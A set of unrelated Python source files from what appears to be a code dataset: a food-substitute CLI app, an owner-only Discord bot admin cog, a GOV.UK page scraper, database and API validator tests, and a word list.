food\n\ndef makePage(data):\n \"\"\"Function that permit to slice all the foods of categorie\n by table of 20 \"\"\"\n nbPage = data.count() // 20\n if data.count() % 20 is not 0:\n nbPage += 1\n if data.count() < 20:\n nbPage = 1\n first, last, step, pageList = 0, 20, 20, list()\n for i in range(nbPage):\n if i is not (nbPage - 1):\n #intermediary page\n pageList.append(data[first: last])\n else:\n #the last page\n pageList.append(data[first:]) # append the data left\n first += step\n last += step\n return pageList\n\n\ndef printFoods(pageList, pageNum):\n print(\"=\" * 50)\n for elt in pageList[pageNum - 1]:\n print(\"{}: {}\".format(elt.id, elt.name))\n print(\" \" * 40, end=\" \")\n print(\"Page {} on {}\".format(pageNum, len(pageList)))\n print(\"=\" * 50)\n\n\ndef showFoodsMenu():\n print(\"\\n1: Choose a food on this page\")\n print(\"2: Visit another page\")\n print(\"0: Quit\\n\")\n\n\ndef showFoodsMenu2():\n print(\"\\n1: Choose a food\")\n print(\"0: Quit\\n\")\n\n\ndef getFoodsMenuChoice():\n ok = False\n while(not ok):\n try:\n choice = int(input(\"Do your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 2, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\ndef getFoodsMenuChoice2():\n ok = False\n while(not ok):\n try:\n choice = int(input(\"Do your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\ndef getFoodsPage(maxPage):\n ok = False\n choice = None\n while (not ok):\n try:\n choice = int(input(\"Enter the page number: \"))\n except ValueError:\n print(\"The number entered is not an integer\")\n\n if(choice in range(1, maxPage+1)):\n ok = True\n else:\n print(\"This page do not exist, please try again\")\n ok = False\n return choice\n\n\ndef getFoodsNumber(maxFoods):\n ok = False\n choice = None\n while (not ok):\n try:\n choice = int(input(\"Enter the food number: \"))\n except ValueError:\n print(\"The number entered is not an integer\")\n\n if(choice > 0 and choice <= maxFoods):\n ok = True\n else:\n print(\"Number must be positive; try again\")\n ok = False\n return choice\n\n\ndef chooseFood(engine, categoryNumber, maxFoods):\n #connect to the db\n connection = engine.connect()\n Session = sessionmaker(bind=engine)\n session = Session()\n #query the db about foods of given category\n foodsAll = session.query(Foods).filter(Foods.categories_id ==\n categoryNumber)\n #slice the result in multiple pages\n pageList = makePage(foodsAll)\n #print the first food page of the category\n printFoods(pageList, 1)\n #display the food menu\n showFoodsMenu()\n #take the user choice\n foodsMenuChoice = getFoodsMenuChoice()\n\n if(foodsMenuChoice is 1):\n #choose a food on the first page\n foodNumber = getFoodsNumber(maxFoods)\n #query the db about this food id\n if session.query(exists().where(Foods.id == foodNumber)).scalar():\n food = session.query(Foods).filter(Foods.id == foodNumber).first()\n print(food)\n #display a subtitute of the food\n print(\"Here is a substitute:\")\n #query the db about foods on the same category\n #where nutrion grade are better than the selected food\n if bool(session.query(Foods).\n filter(Foods.nutrition_grade <= food.nutrition_grade).\n filter(Foods.categories_id == categoryNumber)):\n subFoods = session.query(Foods).\\\n filter(Foods.categories_id == 
categoryNumber).\\\n filter(Foods.nutrition_grade <= food.nutrition_grade).all()\n subFoodIndex = randrange(len(subFoods))\n subFood = subFoods[subFoodIndex]\n print(subFood)\n addInDb = input(\"Save the food ? (y/n)\")\n if(addInDb in (\"Y\", \"y\")):\n myFood = MyFoods()\n myFood.food_id = food.id\n myFood.food_substitute_id = subFood.id\n\n session.add(myFood)\n print(\"Food saved...\")\n session.commit()\n else:\n print(\"Food not saved !\")\n else:\n print(\"No better substitute found...\")\n elif(foodsMenuChoice is 2):\n #choose a food on other page\n otherPage, choice = True, None\n while(otherPage):\n foodPage = getFoodsPage(len(pageList))\n printFoods(pageList, foodPage)\n choice = input(\"\\nOther page ? (y/n):\")\n if choice in (\"Y\", \"y\"):\n otherPage = True\n else:\n otherPage = False\n showFoodsMenu2()\n foodsMenuChoice2 = getFoodsMenuChoice2()\n if(foodsMenuChoice2 is 1):\n #choose a food on the selected page\n foodNumber = getFoodsNumber(maxFoods)\n #query the db about this food id\n if session.query(exists().where(Foods.id == foodNumber)).scalar():\n food = session.query(Foods).filter(Foods.id == foodNumber).first()\n print(food)\n #display a subtitute of the food\n print(\"Here is a substitute:\")\n #query the db about foods on the same category\n #where nutrion grade are better than the selected food\n if bool(session.query(Foods).\n filter(Foods.nutrition_grade <= food.nutrition_grade).\n filter(Foods.categories_id == categoryNumber)):\n subFoods = session.query(Foods).\\\n filter(Foods.categories_id == categoryNumber).\\\n filter(Foods.nutrition_grade <= food.nutrition_grade)\n subFoodIndex = randrange(len(subFoods.all()))\n subFood = subFoods.all()[subFoodIndex]\n print(subFood)\n addInDb = input(\"Save the two foods ? (y/n)\")\n if(addInDb in (\"Y\", \"y\")):\n myFood = MyFoods()\n myFood.food_id = food.id\n myFood.food_substitute_id = subFood.id\n\n session.add(myFood)\n session.commit()\n\n print(\"Food saved...\")\n else:\n print(\"Food not saved !\")\n else:\n print(\"No better substitute found...\")\n else:\n print(\"Returning to the start...\\n\")\n else:\n print(\"Returning to the start...\\n\")\n #close the connection\n connection.close()\n\n\ndef showFavoritesFoods(engine, detailled=False):\n connection = engine.connect()\n Session = sessionmaker(bind=engine)\n session = Session()\n #query the db about favorites foods saved\n q = session.query(Foods).join(MyFoods.food).all() +\\\n session.query(Foods).join(MyFoods.food_substitute).all()\n for food in q:\n print(\"-\" * 50)\n if(detailled):\n print(food)\n else:\n print(food.name)\n print(\"-\" * 50)\n connection.close()\n\n\ndef run():\n MAX_FOODS = maxFoods()\n mainLoop = True\n while(mainLoop):\n subLoop = True\n showStartMenu()\n startMenuChoice = getStartMenuChoice()\n while(subLoop):\n if(startMenuChoice is 1):\n showCategoriesList(engine)\n showCategoryMenuChoice()\n categoryMenuChoice = getCategoryMenuChoice()\n if(categoryMenuChoice is 1):\n categoryNumber = getCategoryNumberChoice(MAX_FOODS_CAT)\n chooseFood(engine, categoryNumber, MAX_FOODS)\n else:\n #go back to the start menu\n subLoop = False\n elif(startMenuChoice is 2):\n sectionLoop = True\n while(sectionLoop):\n showSavedFoodsMenu()\n choice = getStartMenuChoice()\n if choice is 1:\n print(\"\\n\\nYour favorites foods name list : \\n\")\n showFavoritesFoods(engine)\n elif choice is 2:\n print(\"\\n\\nYour favorites foods list detailled :\\n\")\n showFavoritesFoods(engine, True)\n else:\n sectionLoop = False\n subLoop = False\n else:\n 
print(\"Bye...\")\n subLoop = False\n mainLoop = False\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"140865570","text":"from traceback import format_exc\nfrom asyncio import iscoroutine\nfrom aiohttp import ClientSession\nfrom discord import Member, Message\nfrom discord.ext.commands import command, Context, group\nfrom cogs.utils.custom_bot import CustomBot\nfrom cogs.utils.family_tree.family_tree_member import FamilyTreeMember\n\n\nclass CalebOnly(object):\n '''\n The parentage cog\n Handles the adoption of parents\n '''\n\n def __init__(self, bot:CustomBot):\n self.bot = bot\n self.last_tree = None\n self.stream = None # May be channel/ID\n\n\n async def __local_check(self, ctx:Context):\n return ctx.author.id == self.bot.config['owner']\n\n\n @property\n def stream_channel(self):\n channel_id = self.bot.config['stream_channel']\n channel = self.bot.get_channel(channel_id)\n return channel\n\n\n @command()\n async def send(self, ctx:Context, *, content:str):\n '''\n Sends content to the current stream channel\n '''\n\n if self.stream == None:\n await ctx.send(\"No stream currently set up.\")\n return\n await self.stream.send(content)\n\n\n @command(aliases=['cs'])\n async def channelstream(self, ctx:Context, channel_id:int=None):\n '''\n Streams a channel's output to the chat log\n '''\n\n if channel_id == None:\n self.stream = None\n await ctx.send(\"Cleared stream.\")\n return\n self.stream = self.bot.get_channel(channel_id)\n # self.stream = channel\n await ctx.send(f\"Channel set to `{self.stream.name}` (`{self.stream.id}`)\")\n\n\n async def on_message(self, message:Message):\n '''\n Log streamed messages to channel\n '''\n\n if not message.channel:\n return\n if not self.stream:\n return\n if not self.stream_channel:\n return\n if message.channel.id == self.stream.id:\n attachments = [i.url for i in message.attachments]\n if message.content:\n text = f\"**Streamed Message** | User: `{message.author!s}` (`{message.author.id}`)\\nContent: `{message.content}`\"\n else:\n text = f\"**Streamed Message** | User: `{message.author!s}` (`{message.author.id}`)\\nNo text content in message.\"\n if attachments:\n text += '\\nAttachments: ' + ', '.join(attachments)\n await self.stream_channel.send(text) \n\n\n @command()\n async def ev(self, ctx:Context, *, content:str):\n '''\n Runs some text through Python's eval function\n '''\n\n try:\n ans = eval(content, globals(), locals())\n except Exception as e:\n await ctx.send('```py\\n' + format_exc() + '```')\n return\n if iscoroutine(ans):\n ans = await ans\n await ctx.send('```py\\n' + str(ans) + '```')\n\n\n @command(aliases=['rld'])\n async def reload(self, ctx:Context, *cog_name:str):\n '''\n Unloads a cog from the bot\n '''\n\n self.bot.unload_extension('cogs.' + '_'.join([i for i in cog_name]))\n try:\n self.bot.load_extension('cogs.' 
+ '_'.join([i for i in cog_name]))\n except Exception as e:\n await ctx.send('```py\\n' + format_exc() + '```')\n return\n await ctx.send('Cog reloaded.')\n\n\n @command()\n async def runsql(self, ctx:Context, *, content:str):\n '''\n Runs a line of SQL into the sparcli database\n '''\n\n async with self.bot.database() as db:\n x = await db(content) or 'No content.'\n if type(x) in [str, type(None)]:\n await ctx.send(x)\n return\n\n # Get the results into groups\n column_headers = list(x[0].keys())\n grouped_outputs = {}\n for i in column_headers:\n grouped_outputs[i] = []\n for guild_data in x:\n for i, o in guild_data.items():\n grouped_outputs[i].append(str(o))\n\n # Everything is now grouped super nicely\n # Now to get the maximum length of each column and add it as the last item\n for key, item_list in grouped_outputs.items():\n max_len = max([len(i) for i in item_list + [key]])\n grouped_outputs[key].append(max_len)\n\n # Format the outputs and add to a list\n key_headers = []\n temp_output = []\n for key, value in grouped_outputs.items():\n # value is a list of unformatted strings\n key_headers.append(format(key, '<' + str(value[-1])))\n formatted_values = [format(i, '<' + str(value[-1])) for i in value[:-1]]\n # string_value = '|'.join(formatted_values)\n temp_output.append(formatted_values)\n key_string = '|'.join(key_headers)\n\n # Rotate the list because apparently I need to\n output = []\n for i in range(len(temp_output[0])):\n temp = []\n for o in temp_output:\n temp.append(o[i])\n output.append('|'.join(temp))\n\n # Add some final values before returning to the user\n line = '-' * len(key_string)\n output = [key_string, line] + output \n string_output = '\\n'.join(output)\n await ctx.send('```\\n{}```'.format(string_output))\n\n\n @group()\n async def profile(self, ctx:Context):\n '''\n A parent group for the different profile commands\n '''\n\n pass\n\n\n @profile.command(aliases=['username'])\n async def name(self, ctx:Context, *, username:str):\n '''\n Lets you change the username of the bot\n '''\n\n if len(username) > 32:\n await ctx.send('That username is too long to be compatible with Discord.')\n return \n\n await self.bot.user.edit(username=username)\n await ctx.send('Done.')\n\n\n @profile.command(aliases=['photo', 'image', 'avatar'])\n async def picture(self, ctx:Context, *, image_url:str=None):\n '''\n Lets you change the username of the bot\n '''\n\n if image_url == None:\n try:\n image_url = ctx.message.attachments[0].url \n except IndexError:\n await ctx.send(\"You need to provide an image.\")\n return\n\n async with ClientSession(loop=self.bot.loop) as session:\n async with session.get(image_url) as r:\n image_content = await r.read()\n await self.bot.user.edit(avatar=image_content)\n await ctx.send('Done.')\n\n\ndef setup(bot:CustomBot):\n x = CalebOnly(bot)\n bot.add_cog(x)\n\n\n","sub_path":"cogs/caleb_only.py","file_name":"caleb_only.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"323186813","text":"# Appendix C4 - content_importer.py\n\nfrom .db_handler import DBHandler\nfrom .tables import Document\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\n\n# Future implementation: Tuning features by adding Documents' to their content. 
Maybe with a multiplier.\nclass ContentImporter(object):\n def __init__(self, db_name=\"klassify\"):\n self.DBH = DBHandler(db_name, echo=False)\n self.ROOT_URL = \"https://www.gov.uk\"\n self.NON_RELEVANT_PHRASES = [\n \"Skip to main content\",\n \"Find out more about cookies\"\n \"GOV.UK uses cookies to make the site simpler\",\n \"Is there anything wrong with this page\",\n \"Last updated\",\n \"Other ways to apply\",\n \"Before you start\",\n \"Elsewhere on the web\",\n \"Find out about call charges\",\n \"find out more about beta services\",\n \"Return to top ↑\",\n \"Find out more about cookies\",\n \"GOV.UK\",\n \"Don’t include personal or financial information\",\n \"Help us improve\",\n \"This file may not be suitable for users of assistive technology\"\n \"If you use assistive technology and need a version of this document in a more accessible format\",\n \"tell us what format you need It will help us if you say what assistive technology you use\",\n \"Request a different format\",\n \"What you were doing\",\n \"What went wrong\",\n \"uses cookies to make the site simpler.\"\n ]\n\n def parse_page(self, page):\n soup = BeautifulSoup(page, 'html.parser')\n return soup\n\n def extract_page_content(self, page):\n return page.text\n\n # Iterate through each Document in the database, get their URL on the site and\n # query it to obtain their HTML and eventually store it.\n def import_documents_html(self):\n documents = self.DBH.session.query(Document).all()\n\n count = 0\n for doc in documents:\n if doc.html == None:\n time.sleep(0.75)\n doc.html = requests.get(doc.web_url).text\n self.DBH.session.commit()\n count += 1\n if count % 250 == 0: print(\"Documents processed: %d/%d\" %(count, len(documents)))\n\n # Iterate through the Documents' HTML, parse it and store it.\n def extract_documents_content(self):\n documents = self.DBH.session.query(Document).all()\n\n count = 0\n for doc in documents:\n doc.content = self.extract_content(doc)\n self.DBH.session.commit()\n count += 1\n if count % 250 == 0: print(\"Documents processed: %d/%d\" %(count, len(documents)))\n\n def extract_content(self, document):\n page = self.parse_page(document.html)\n page = self.remove_unwanted_tags(page)\n page = self.get_body(page)\n\n page_content = self.extract_page_content(page)\n page_content = self.remove_non_relevant_content(page_content)\n page_content = self.remove_punctuaction_and_numbers(page_content)\n return page_content\n\n def get_body(self, page):\n return page.body\n\n # Discard anything inside footer, header and scripts\n def remove_unwanted_tags(self, page):\n for tag in page.find_all(['footer', 'script', 'header']):\n tag.replace_with('')\n\n return page\n\n def remove_non_relevant_content(self, page):\n for phrase in self.NON_RELEVANT_PHRASES:\n page = page.replace(phrase, \"\")\n return page\n\n def remove_punctuaction_and_numbers(self, page):\n punctuation = [ '\\\\', '>', '_', '`', '{', ']', '*', '[',\n '^', '+', '!', '(', ':', ';', \"'\", \"’\",\n '<', '|', '\"', '?', '=', '}', '&', '/',\n '$', ')', '~', '#', '%', ',' ]\n page = ''.join(ch for ch in page if ch not in punctuation)\n page = ''.join([i for i in page if not i.isdigit()])\n return page\n","sub_path":"src/content_importer.py","file_name":"content_importer.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78763049","text":"# -*- coding: utf-8 -*-\nimport pytest\nimport time\nimport datetime\n\nfrom io import StringIO\nfrom 
codecs import open\n\nfrom sqlalchemy import event, Table\nfrom sqlalchemy.ext.declarative.api import DeclarativeMeta\nfrom sqlalchemy.exc import IntegrityError, OperationalError, ProgrammingError\nfrom sqlalchemy.orm.util import object_state\nfrom collections import OrderedDict\n\nfrom oar.lib import fixture\nfrom oar.lib.database import Database, SessionProperty, QueryProperty\n\nfrom oar.lib.utils import to_json, to_unicode, json\n\nfrom .. import assert_raises\n\n\nclass EngineListener(object):\n\n def __init__(self, engine, ignored=('PRAGMA')):\n self.engine = engine\n self.ignored = ignored\n self.buf = StringIO()\n\n @event.listens_for(engine, \"before_cursor_execute\")\n def before_cursor_execute(conn, cursor, statement,\n parameters, context, executemany):\n sql = to_unicode(statement)\n for string in self.ignored:\n if sql.lower().startswith(string.lower()):\n return\n sql = sql.replace(' \\n', '\\n').rstrip('\\n')\n self.buf.write(sql.rstrip('\\n') + \";\" + '\\n')\n\n @property\n def raw_sql(self):\n self.buf.seek(0)\n return self.buf.getvalue().replace('\\t', ' ')\\\n .rstrip('\\n')\n\n\n@pytest.fixture(scope='function')\ndef db(request):\n db = Database(uri='sqlite://')\n\n association_table = db.Table(\n 'association',\n db.Column('movie_id', db.Integer, db.ForeignKey('movie.id')),\n db.Column('actor_id', db.Integer, db.ForeignKey('actor.id'))\n )\n\n class Movie(db.Model):\n __table_args__ = (\n db.UniqueConstraint('title', name='uix_1'),\n {'sqlite_autoincrement': True},\n )\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(20))\n\n class Actor(db.DeferredReflectionModel):\n __table_args__ = (\n db.Index('name', 'lastname', 'firstname'),\n db.UniqueConstraint('firstname', 'lastname', name='uix_1')\n )\n\n id = db.Column(db.Integer, primary_key=True)\n firstname = db.Column(db.String(20))\n lastname = db.Column(db.String(20))\n birthday = db.Column(db.DateTime, nullable=False,\n default=datetime.datetime.utcnow)\n movies = db.relationship(\"Movie\",\n secondary=association_table,\n backref=\"actors\")\n return db\n\n\ndef test_sqlite_schema(db):\n engine_listener = EngineListener(db.engine)\n db.create_all()\n\n expected_schemas = \"\"\"\nCREATE TABLE movie (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n title VARCHAR(20) NOT NULL,\n CONSTRAINT uix_1 UNIQUE (title)\n);\n\nCREATE TABLE actor (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n firstname VARCHAR(20) NOT NULL,\n lastname VARCHAR(20) NOT NULL,\n birthday DATETIME NOT NULL,\n CONSTRAINT uix_1 UNIQUE (firstname, lastname)\n);\nCREATE INDEX name ON actor (lastname, firstname);\n\nCREATE TABLE association (\n movie_id INTEGER NOT NULL,\n actor_id INTEGER NOT NULL,\n FOREIGN KEY(movie_id) REFERENCES movie (id),\n FOREIGN KEY(actor_id) REFERENCES actor (id)\n);\"\"\"\n for schema in expected_schemas.split(';'):\n assert schema.strip() in engine_listener.raw_sql\n\n\ndef test_model_args(db):\n db.create_all()\n assert db['actor'].name == \"actor\"\n index_columns = list(list(db['actor'].indexes)[0].columns)\n assert index_columns[0].name == \"lastname\"\n assert index_columns[1].name == \"firstname\"\n\n\ndef test_collected_tables_and_models(db):\n db.create_all()\n model_names = ('Actor', 'Movie')\n table_names = ('actor', 'movie', 'association')\n for model_name in model_names:\n assert model_name in db\n assert isinstance(db[model_name], DeclarativeMeta)\n\n for table_name in table_names:\n assert table_name in db\n assert isinstance(db[table_name], Table)\n\n with 
assert_raises(KeyError):\n db['totototo']\n\n\ndef test_deferred_reflection(db):\n db.create_all()\n db.op.add_column('actor', db.Column('salary', db.Integer,\n nullable=True,\n default=1000000))\n db.reflect()\n db['Actor'].create(firstname=\"Ben\", lastname=\"Affleck\", salary=12000000)\n affleck = db['Actor'].query.first()\n keys = list(OrderedDict(affleck).keys())\n assert affleck.salary == 12000000\n assert ['id', 'firstname', 'lastname', 'birthday', 'salary'] == keys\n\n\ndef test_db_api_create_and_delete_all(db):\n db.create_all()\n db.reflect()\n dicaprio = db['Actor'].create(firstname=\"Leonardo\", lastname=\"DiCaprio\")\n ruffalo = db['Actor'].create(firstname=\"Mark\", lastname=\"Ruffalo\")\n shutter_island = db['Movie'].create(title=\"Shutter Island\")\n shutter_island.actors.append(dicaprio)\n shutter_island.actors.append(ruffalo)\n\n dicaprio = db['Actor'].query.filter_by(firstname=\"Leonardo\").first()\n assert dicaprio.lastname == \"DiCaprio\"\n assert dicaprio.movies[0].actors[0] is dicaprio\n assert dicaprio.movies[0].actors[1] is ruffalo\n\n with assert_raises(IntegrityError):\n db['Actor'].create(firstname=\"Leonardo\", lastname=\"DiCaprio\")\n\n db.delete_all()\n assert db['Actor'].query.count() == 0\n assert db['Movie'].query.count() == 0\n assert len(db.session.execute(db['association'].select()).fetchall()) == 0\n\n\ndef test_db_api_to_dict_json(db):\n db.create_all()\n db.reflect()\n Actor, Movie = db['Actor'], db['Movie']\n dt = datetime.datetime(2015, 7, 19, 9, 14, 22, 140921)\n a1 = Actor.create(firstname=\"Leonardo\", lastname=\"DiCaprio\", birthday=dt)\n a2 = Actor.create(firstname=\"Mark\", lastname=\"Ruffalo\")\n m1 = Movie.create(title=\"Shutter Island\")\n m1.actors.append(a1)\n m1.actors.append(a2)\n\n item = Actor.query.filter_by(firstname=\"Leonardo\").first()\n item_dict = OrderedDict([('id', 1),\n ('firstname', 'Leonardo'),\n ('lastname', 'DiCaprio'),\n ('birthday', dt)])\n assert item.to_dict() == item_dict\n expected_json = \"\"\"\n{\n \"id\": 1,\n \"firstname\": \"Leonardo\",\n \"lastname\": \"DiCaprio\",\n \"birthday\": \"2015-07-19T09:14:22.140921\"\n}\"\"\".strip()\n assert item.to_json() == expected_json\n assert to_json(item) == expected_json\n\n\ndef test_db_api_others(db):\n assert repr(db) == \"\"\n db.create_all()\n assert repr(db) == \"\"\n assert db.metadata == db.Model.metadata\n movie = db['Movie'].create(title=\"Mad Max\")\n assert repr(movie) == \"\"\n\n assert db.query(db['Movie']).first().title == \"Mad Max\"\n assert db.dialect == \"sqlite\"\n\n\ndef test_db_api_add(db):\n db.create_all()\n movie = db['Movie'](title=\"Mad Max\")\n db.add(movie)\n assert db['Movie'].query.first().title == \"Mad Max\"\n\n\ndef test_db_api_rollback(db):\n db.create_all()\n movie = db['Movie'](title=\"Mad Max\")\n db.add(movie)\n db.rollback()\n assert db['Movie'].query.first() is None\n\n\ndef test_db_api_flush(db):\n db.create_all()\n movie = db['Movie'](title=\"Mad Max\")\n db.add(movie)\n assert object_state(movie).pending is True\n db.flush()\n assert object_state(movie).persistent is True\n db.commit()\n\n\ndef test_db_api_close(db):\n assert db.connector is None\n db.create_all()\n db['Movie'].create(title=\"Mad Max\")\n db.add(db['Movie'](title=\"Mad Max\"))\n assert db.connector is not None\n session = db.session\n assert session.new\n db.close()\n assert db.connector is None\n assert not session.new\n\n\ndef test_internal_operations(db):\n assert isinstance(Database.session, SessionProperty)\n assert Database.Model is None\n assert 
Database.query_class is None\n assert Database.query_collection_class is None\n assert isinstance(db.Model.query, QueryProperty)\n\n\ndef test_load_fixtures(db, tmpdir):\n ts = int(time.time())\n\n db.create_all()\n\n db.op.add_column(\n table_name='actor',\n column=db.Column('start_time', db.Integer, nullable=True),\n )\n\n db.reflect()\n db.__time_columns__ = [\"start_time\"]\n\n Actor, Movie = db['Actor'], db['Movie']\n a1 = Actor.create(firstname=\"Leonardo\", lastname=\"DiCaprio\", start_time=ts)\n a2 = Actor.create(firstname=\"Mark\", lastname=\"Ruffalo\", start_time=ts)\n m1 = Movie.create(title=\"Shutter Island\")\n m1.actors.append(a1)\n m1.actors.append(a2)\n\n assert Actor.query.order_by(Actor.id).first().start_time == ts\n\n filepath = tmpdir.join('fixtures.json').strpath\n fixture.dump_fixtures(db, filepath, ref_time=ts)\n\n data = {}\n with open(filepath, 'r', encoding='utf-8') as fd:\n data = json.load(fd)\n\n assert data['metadata']['ref_time'] == ts\n\n fixture.load_fixtures(db, filepath, clear=True, ref_time=None)\n assert Actor.query.order_by(Actor.id).first().start_time == ts\n\n fixture.load_fixtures(db, filepath, clear=True, ref_time=(ts - 10))\n assert Actor.query.order_by(Actor.id).first().start_time == (ts - 10)\n\n with assert_raises(IntegrityError):\n fixture.load_fixtures(db, filepath)\n\n\n@pytest.mark.skipif(\"os.environ.get('DB_TYPE', '') == 'memory'\",\n reason=\"need persistent database\")\ndef test_read_only_session():\n from oar.lib import db\n lenght = len(db['Resource'].query.all())\n if db.dialect == \"sqlite\":\n exception = OperationalError\n else:\n exception = ProgrammingError\n with assert_raises(exception):\n with db.session(read_only=True):\n assert len(db['Resource'].query.all()) == lenght\n db['Resource'].create()\n len(db['Resource'].query.all()) == lenght\n","sub_path":"tests/lib/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"9331659","text":"# pylint: disable=relative-beyond-top-level,import-outside-toplevel\nimport os\nimport unittest\nfrom traceback import print_exc\n\nfrom optimade.validator import ImplementationValidator\n\nfrom .utils import SetClient\n\n\nclass ServerTestWithValidator(SetClient, unittest.TestCase):\n\n server = \"regular\"\n\n def test_with_validator(self):\n validator = ImplementationValidator(client=self.client)\n try:\n validator.main()\n except Exception:\n print_exc()\n self.assertTrue(validator.valid)\n\n\nclass IndexServerTestWithValidator(SetClient, unittest.TestCase):\n\n server = \"index\"\n\n def test_with_validator(self):\n validator = ImplementationValidator(client=self.client, index=True)\n try:\n validator.main()\n except Exception:\n print_exc()\n self.assertTrue(validator.valid)\n\n\ndef test_mongo_backend_package_used():\n import pymongo\n import mongomock\n from optimade.server.entry_collections import client\n\n force_mongo_env_var = os.environ.get(\"OPTIMADE_CI_FORCE_MONGO\", None)\n if force_mongo_env_var is None:\n return\n\n if int(force_mongo_env_var) == 1:\n assert issubclass(client.__class__, pymongo.MongoClient)\n elif int(force_mongo_env_var) == 0:\n assert issubclass(client.__class__, mongomock.MongoClient)\n else:\n raise Exception(\n \"The environment variable OPTIMADE_CI_FORCE_MONGO cannot be parsed as an int.\"\n )\n\n\nclass AsTypeTestsWithValidator(SetClient, unittest.TestCase):\n\n server = \"regular\"\n\n def 
test_as_type_with_validator(self):\n\n test_urls = {\n \"http://example.org/v0/structures\": \"structures\",\n \"http://example.org/v0/structures/mpf_1\": \"structure\",\n \"http://example.org/v0/references\": \"references\",\n \"http://example.org/v0/references/dijkstra1968\": \"reference\",\n \"http://example.org/v0/info\": \"info\",\n \"http://example.org/v0/links\": \"links\",\n }\n with unittest.mock.patch(\n \"requests.get\", unittest.mock.Mock(side_effect=self.client.get)\n ):\n for url, as_type in test_urls.items():\n validator = ImplementationValidator(\n base_url=url, as_type=as_type, verbosity=5\n )\n try:\n validator.main()\n except Exception:\n print_exc()\n self.assertTrue(validator.valid)\n","sub_path":"tests/server/test_server_validation.py","file_name":"test_server_validation.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"35910963","text":"import os\n\nfrom django.test import TestCase\n\nfrom compress.conf import settings\nfrom compress.packager import Packager\n\n\nclass PackagerTest(TestCase):\n def setUp(self):\n self.old_compress_url = settings.COMPRESS_URL\n settings.COMPRESS_URL = 'http://localhost/static/'\n\n def test_individual_url(self):\n \"\"\"Check that individual URL is correctly generated\"\"\"\n packager = Packager()\n filename = os.path.join(settings.COMPRESS_ROOT, u'js/application.js')\n individual_url = packager.individual_url(filename)\n self.assertEqual(individual_url,\n \"http://localhost/static/js/application.js\")\n\n def test_external_urls(self):\n packager = Packager()\n packages = packager.create_packages({\n 'jquery': {\n 'external_urls': ('//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js',)\n },\n 'application': {\n 'source_filenames': ('js/application.js',),\n 'output_filename': 'application.r?.js'\n }\n })\n self.assertEqual(packages, {\n 'jquery': {\n 'externals': ('//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js',)\n },\n 'application': {\n 'context': {},\n 'output': 'application.r?.js',\n 'paths': ['js/application.js']\n }\n })\n\n def tearDown(self):\n settings.COMPRESS_URL = self.old_compress_url\n","sub_path":"tests/tests/packager.py","file_name":"packager.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651258466","text":"import pandas as pd\nimport numpy as np\nimport time\n\nmouse = pd.read_csv(\"G:/Inputs/6 month/PH00313.txt\", header=36, sep=\";\", na_values=[\"-\", \"cm\", \"cm?\", \"s\", \"s?\", \"cm/s\", \"cm/s?\"])\nMovFrame = mouse[[\"Recording time\", \"Distance moved\"]]\ndel mouse\nMovFrame = MovFrame.drop(MovFrame.index[0])\nMovFrame = MovFrame.reset_index()\ndel MovFrame[\"index\"]\nMovFrame[\"Distance moved\"][0] = 0\nMovFrame[\"Distance moved\"][MovFrame[\"Distance moved\"] < 2] = 0\nMovFrame[\"Velocity\"] = MovFrame[\"Distance moved\"] / 0.066\nsize = len(MovFrame)\ninterval = 1\noutputrange = int(MovFrame[\"Recording time\"][size-1] / interval)\noutputarray1 = np.zeros(outputrange)\noutputarray2 = np.zeros(outputrange)\nrangeStart = 0\nrangeEnd = rangeStart + interval\n\nstartTime = time.time()\t\nMoving = MovFrame[(MovFrame[\"Recording time\"] > 0) & (MovFrame[\"Recording time\"] < 1)]\nMoving = Moving.reset_index()\ndel Moving[\"index\"]\nVelocityChange = Moving[\"Velocity\"][len(Moving)-1] - Moving[\"Velocity\"][0]\noutputarray2[0] = VelocityChange / interval\nrangeStart = rangeStart + 
interval\nrangeEnd = rangeEnd + interval\ndel Moving\nelapsedTime = time.time() - startTime\nprint(elapsedTime)\nprint(elapsedTime * 345600)\t","sub_path":"timetest.py","file_name":"timetest.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"546181342","text":"import random\n\nWORDS = [\"аист\", \"акула\", \"бабуин\", \"баран\", \"барсук\", \"бобр\", \"бык\", \"варан\", \"верблюд\", \"волк\", \"вомбат\", \"воробей\", \"ворон\", \"выдра\",\n\"голубь\", \"гусь\", \"додо\", \"дятел\", \"енот\", \"ехидна\", \"еж\", \"жаба\", \"жираф\", \"журавль\", \"заяц\", \"зебра\", \"землеройка\", \"зяблик\",\n\"игуана\", \"кабан\", \"казуар\", \"кайман\", \"какаду\", \"кальмар\", \"камбала\", \"канарейка\", \"каракатица\", \"карп\", \"кенгуру\",\n\"киви\", \"кит\", \"лама\", \"ламантин\", \"ласка\", \"ласточка\", \"лебедь\", \"лев\", \"лемур\", \"ленивец\", \"леопард\", \"лиса\", \"лягушка\",\n\"мотылек\", \"муравьед\", 